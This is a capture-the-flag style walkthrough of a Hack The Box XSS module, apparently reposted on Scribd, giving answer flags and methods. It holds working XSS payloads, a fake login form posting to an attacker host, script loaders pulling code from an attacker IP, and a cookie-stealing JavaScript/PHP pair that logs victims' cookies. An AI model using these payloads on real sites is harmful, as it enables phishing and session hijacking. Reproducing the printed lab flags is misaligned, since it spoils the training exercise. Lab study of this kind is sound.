Scribd
Upload
3K views22 pages

Cross-Site Scripting (XSS)

Uploaded by

qzombexzombe114
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
3K views22 pages

Cross-Site Scripting (XSS)

Uploaded by

qzombexzombe114
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 22

Cross-Site Scripting (XSS):

Link to challenge: https://academy.hackthebox.com/module/103


(log in required)
Class: Tier II | Easy | Offensive

XSS Basics
Stored XSS:
Question: To get the flag, use the same payload we used above, but change its
JavaScript code to show the cookie instead of showing the url.
Answer: HTB{570r3d_f0r_3v3ry0n3_70_533}
Method: first, lets open the website in the browser:
http://<target-IP>:<target-port>

We can add some tasks.

To get the cookie, we will add the following ‘task’:


<script>alert(document.cookie)</script>
The flag will appear on alert window

Reflected XSS:
Question: To get the flag, use the same payload we used above, but change its
JavaScript code to show the cookie instead of showing the url.
Answer: HTB{r3fl3c73d_b4ck_2_m3}
Method: in this question we will get to the same looking website as before,
and we will enter to the input box this payload:
<div></div><ul class="list-unstyled" id="todo"><div
style="padding-left:25px">Task
'<script>alert(document.cookie)</script>' could not be
added.</div></ul>
The difference is, with this payload we will affect the html page as well:

DOM XSS:
Question: To get the flag, use the same payload we used above, but change its
JavaScript code to show the cookie instead of showing the url.
Answer: HTB{pur3ly_cl13n7_51d3}
Method: the ‘task’ we will add to the website input box is:
<img src="" onerror=alert(document.cookie)>
XSS Discovery:
Question: Utilize some of the techniques mentioned in this section to identify
the vulnerable input parameter found in the above server. What is the name of
the vulnerable parameter?
Answer: email
Method: in this section we get to a new website:

Which have 4 different input parameters, and we need to determine which one
is XXS vulnerable.
Lets use burpsuite to intercept registration request to see what are the
parameters names:

The parameters names are ‘fullname’, ‘username’, ‘password’, ‘email’.

Now, lets use an automated tool called ‘XXStrike’ to determine which one of
those parameter is vulnerable. Lets download and install it to our pwnbox:
git clone https://github.com/s0md3v/XSStrike.git;
cd XSStrike;
pip install -r requirements.txt;

*
*

Now we are ready to run the tool:


python xsstrike.py -u "http://<target-IP>:<target-
port>?fullname=jonsnow&username=jonsnow&password=winterfell&
[email protected]"
The tool found the parameter ‘email’ as XXS vulnerable.

Question: What type of XSS was found on the above server? "name only"
Answer: Reflected
Method: the screenshot on the tool execution above found a Reflection XXS (as
we can see on the marked area of the screenshot)
XSS Attacks
Phishing:
Question: Try to find a working XSS payload for the Image URL form found at
'/phishing' in the above server, and then use what you learned in this section to
prepare a malicious URL that injects a malicious login form. Then visit
'/phishing/send.php' to send the URL to the victim, and they will log into the
malicious login form. If you did everything correctly, you should receive the
victim's login credentials, which you can use to login to '/phishing/login.php'
and obtain the flag.
Answer: HTB{r3f13c73d_cr3d5_84ck_2_m3}
Method: for this question we are provided with the path ‘/phishing’ – for the
target server website at:
http://<target-IP>/phishing

We can use that to display URLs of images:


We can also use that to inject html code to manipulate the page structure –
such that a login page will appear:
document.write('<h3>Please login to continue</h3><form
action=http://[attacker-IP]:8081><input type="username"
name="username" placeholder="Username"><input
type="password" name="password"
placeholder="Password"><input type="submit" name="submit"
value="Login"></form>');
we will notice that the the payload will add login, and prelude to send them to
[attacker-IP]:8081 (I used [] instead of the usual <> in order not to confuse with
the html angular brackets):

Now, lets load the next page:


http://<target-IP>/phishing/send.php

It can take it any URL.

Before we do anything to it – lets start netcat listner on ourpwnbox, listening to


port 8081
nc -lnvp 8081

Now, as the netcat running – we copy the index.php modifed URL (after the
html injection:

http://<target-
IP>/phishing/index.php?url=document.write%28%27%3Ch3%3EPleas
e+login+to+continue%3C%2Fh3%3E%3Cform+action%3Dhttp%3A%2F%2F
<attacker-
IP>%3A8081%3E%3Cinput+type%3D%22username%22+name%3D%22userna
me%22+placeholder%3D%22Username%22%3E%3Cinput+type%3D%22pass
word%22+name%3D%22password%22+placeholder%3D%22Password%22%3
E%3Cinput+type%3D%22submit%22+name%3D%22submit%22+value%3D%2
2Login%22%3E%3C%2Fform%3E%27%29%3B
*the URL is the encoded version of the html payload from above), and put it in
the very trusting URL input box:

On the send.php we may get ‘Issue in sending URL!’, but on the netcat listener:
We get credentials! ‘admin:p1zd0nt57341myp455’.

Now lets go to
http://<target-IP>/phishing/login.php

And login with the obtained credentials


Session Hijacking:
Question: Try to repeat what you learned in this section to identify the
vulnerable input field and find a working XSS payload, and then use the
'Session Hijacking' scripts to grab the Admin's cookie and use it in 'login.php' to
get the flag.
Answer: HTB{4lw4y5_53cur3_y0ur_c00k135}
Method: in this question – we go to ‘/hijacking’ path:
http://<target-IP>/hijacking

We get to a registration page with 5 parameters


Lets try to make a registration:
Upon registration..

The conclusion from this request – that whatever XXS attempts we perform on
the inputs – it will not be displayed for us. So we can not just throw ‘alert’ to
check what input field is XXS vulnerable. We will have to use something more
elobarated.

For that we will inject html script that contains javascript which sends a request
to us. From whatever input put the request and receive a request – we know its
XXS vulnerable.

First we start netcat listener on port 8081:


nc -lnvp 8081
Now – we enter the following payload to every input field one by one:
<script src=http://[attaker-IP]:8081></script>
'><script src=http://[attaker-IP]:8081></script>
"><script src=http://[attaker-IP]:8081></script>
javascript:eval('var
a=document.createElement(\'script\');a.src=\'http://[attaker
-IP]:8081\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new
XMLHttpRequest();a.addEventListener("load", b);a.open("GET",
"//[attaker-IP]:8081");a.send();</script>
<script>$.getScript("http://[attaker-IP]:8081")</script>
Until we see a incoming traffic to our netcat listener.

Now – I will tell you upfront that the vulnerable input field is the ‘Profile Picture
URL’ field.
Here is the request at how its seen in burpsuite:

And the netcat incoming request:


Now that we have confirmed that the vulnerable input field is the image URL –
lets exploit it:
First we have to create some files on the pwnbox:
‘index.js’ and ‘index.php’
Lets start with index.js:
touch index.js
in it we put the content:
new Image().src='http://<attacker-
IP>:8081/index.php?c='+document.cookie

The next one is index.php:


touch index.php
in it we put the content:
<?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} |
Cookie: {$cookie}\n");
fclose($file);
}
}
?>
When both files are ready – we run php listener (NOT NETCAT!) on port 8081,
using the command:
sudo php -S 0.0.0.0:8081

Now that the php listener in on, lets inject to the image URL the following
payload:
<script src=http://[attacker-IP]:8081/index.js></script>
'><script src=http://[attacker-IP]:8081/index.js></script>
"><script src=http://[attacker-IP]:8081/index.js></script>
javascript:eval('var
a=document.createElement(\'script\');a.src=\'http://[attacke
r-IP]:8081/index.js\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new
XMLHttpRequest();a.addEventListener("load", b);a.open("GET",
"//[attacker-IP]:8081/index.js");a.send();</script>
<script>$.getScript("http://[attacker-
IP]:8081/index.js")</script>
*make sure to replace all 6 occurrences of ‘[attacker-IP]’ with your own
attacker IP. *
We have the cookie! ‘cookie=c00k1355h0u1d8353cu23d’
*note – if we run the php listener without sudo – we still get the cookie:

But there will be some errors in communication. *

Now that we have the cookie – lets go to


http://<target-IP>/hijacking/login.php

Lets insert the cookie in the firefox cookie editor:


Refresh the page:

**note – if you encounter with ‘First Party Isolation’ in firefox – follow those
steps:

And restart the browser. **


Skills Assessment
Skills Assessment:
Question: What is the value of the 'flag' cookie?
Answer: HTB{cr055_5173_5cr1p71n6_n1nj4}
Method: for the skills assessment – we are provided with the ‘/assessment’
folder to investigate:
http://<target-IP>/assessment
we get to this security blog page:

Further down

there is the Recent Post ‘Welcome to Security Blog’, lets enter it:
I will tell you directly that the vulnerable input field is the Website.
We will have to retrace our steps from ‘Session Hijacking’ section to exploit the
XXS vulnerable input field – which means setting up index.js, index.php, and
run php listener.

index.js:
new Image().src='http://<attacker-
IP>:8081/index.php?c='+document.cookie
index.php:
<?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} |
Cookie: {$cookie}\n");
fclose($file);
}
}
?>

You will notice that both index.js and index.php are the EXACT the same as
their equivalent in ‘Session Hijacking’.

The php listener is also identical:


sudo php -S 0.0.0.0:8081
Now that everything in the receiver side is ready – lets ‘leave a comment’.
The Comment, Name and Email can be normal input values. For the Website
however, our input will be the following:
<script src=http://10.10.14.129:8081/index.js>

And Post Comment..


When the comment was posted: we will get this at the php listener

Flag included.

You might also like